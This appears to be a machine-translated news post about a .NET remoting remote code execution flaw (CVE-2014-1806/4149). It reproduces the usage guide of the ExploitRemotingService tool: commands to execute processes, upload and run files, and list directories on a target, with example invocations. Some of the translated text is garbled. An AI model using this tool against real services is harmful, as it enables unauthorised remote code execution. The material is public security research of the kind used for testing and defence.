Vulnerability warning:. NET Remote Code Execution Vulnerability (including EXP)

Vulnerability warning:. NET Remote Code Execution Vulnerability (including EXP)

Microsoft announced last week. NET open-source good news, its content involves. NET Framework Libraries ,. NET Core Framework Libraries and RyuJit VM, which allows developers to write.. NET program. The application developers laughed. There's nothing to do with it ...... The key is that security researchers also laughed. In the past two days,. NET was exposed to the remote code execution vulnerability.

About the vulnerability discoverer

This is the latest research result from a British security researcher. He has also discovered windows 8.1 preview vulnerabilities before. For this reason, Microsoft officially paid his $0.1 million reward.

We can call it Mr Forshaw, 34 years old and living in London. In an interview with Mr Forshaw, he said:

"I spent about three and a half weeks in the total research process because I started to make some mistakes. I have come up with a lot of ideas before, And I have succeeded. It takes only two weeks from the initial concept to the product I finally sent to Microsoft. I have more than 10 years of experience in this field ."

. NET remote code execution vulnerability EXP

The security tools and procedures (methods) provided in the following content may be offensive and only available for Security Research and Teaching. You are at your own risk!

ExploitRemotingService (c) 2014 James Forshaw ============================================ ========= this is a vulnerability exploitation tool, it can be executed remotely. NET service, the related vulnerability is CVE-2014-1806 or CVE-2014-4149 it is useful only in Windows, although some aspects may be able to run instructions on * nix Mono: ======================== ExploitRemotingService [options] uri command [command args] Copyright (c) James Forshaw 2014

URI:

Below are some supported Uris:

tcp://host:port/ObjName   - TCP connection on host and portnameipc://channel/ObjName     - Named pipe channel

Option:

 -s, --secure               Enable secure mode  -p, --port=VALUE           Specify the local TCP port to listen on  -i, --ipc=VALUE            Specify listening pipe name for IPC channel      --user=VALUE           Specify username for secure mode      --pass=VALUE           Specify password for secure mode      --ver=VALUE            Specify version number for remote, 2 or 4      --usecom               Use DCOM backchannel instead of .NET remoting      --remname=VALUE        Specify the remote object name to register  -v, --verbose              Enable verbose debug output      --useser               Uses old serialization tricks, only works on                             full type filter services  -h, -?, --help

Command:

exec [-wait] program [cmdline]: Execute a process on the hosting servercmd  cmdline                  : Execute a command line process and display stdoutput  localfile remotefile     : Upload a file to the hosting serverget  remotefile localfile     : Download a file from the hosting serverls   remotedir                : List a remote directoryrun  file [args]              : Upload and execute an assembly, calls entry pointuser                          : Print the current usernamever                           : Print the OS version

This tool supports the use of TCP remote service and local IPC service, you must know when used for testing and exploitation. NET remote service and listening (TCP) Port name, or the name of the pipe (IPC), which can usually be found in the server or client code. Find the following calls:
 

RemotingConfiguration.RegisterWellKnownServiceType or Activator.CreateInstance

Then you can try to use it by constructing a suitable URL. For TCP, you can use this URL format.

Tcp: // hostname: port/ServiceName. If it is IPC, use ipc: // NamedPipeName/ServiceName. Let's do a simple test: ExploitRemotingService SERVICEURL ver

If it succeeds, it should print out the operating system version of the managed. NET service. Monofilament if

If you get an exception, it may be that the cve-2014-1806-based vulnerability has been fixed. If that is the case, try using the COM version:

ExploitRemotingService -usecom SERVICEURL ver

It is best to work locally, but you can work remotely if you have the ability to modify the COM configuration or disable the firewall. If it is still ineffective, it may be a server of the latest version. Well, you can still try all the serialized versions. For this reason, the remote service must enable the full typefilter mode (this is some, especially the IPC service)

ExploitRemotingService -useser SERVICEURL ls c:\